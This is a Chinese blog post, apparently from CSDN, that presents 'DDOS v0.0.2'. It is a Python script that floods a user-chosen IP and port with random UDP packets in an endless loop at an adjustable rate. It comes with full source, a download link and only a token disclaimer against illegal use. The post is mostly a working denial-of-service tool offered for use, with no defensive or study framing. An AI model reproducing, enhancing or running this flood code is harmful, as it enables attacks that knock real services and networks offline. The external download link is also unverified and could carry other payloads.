DDOS v0.0.2

更新日志:1、可调1000000的攻击速度

支持平台:Windows,linux,macOS

源代码:

# python3

import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490) # type: ignore
#############

os.system("clear")
os.system("figlet DDos Attack")
print (" ")
print ("|--------------------------------------------------------|")
print ("|   作者          : Gtauuop                              |")
print ("|   作者CSDN    : https://blog.csdn.net/Gtauuop?type=blog|")
print ("|   版本          : V0.0.2                               |")
print ("|--------------------------------------------------------|")
print (" ")
print (" -----------------[切勿用于违法用途(本人概不负责)]----------------- ")
print (" ")
ip = input("请输入您要攻击的 IP     : ")
port = int(input("请输入您要攻击端口      : "))
sd = int(input("请输入您要攻击速度(1~1000000) : "))
sent = 0
while True:
     sock.sendto(bytes, (ip,port))
     sent = sent + 1
     print ("已发送 %s 个数据包到 %s 端口 %d"%(sent,ip,port))
     time.sleep((1000000-sd)/2000000)

下载:https://wwda.lanzouk.com/ioTgo0zydnkb

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值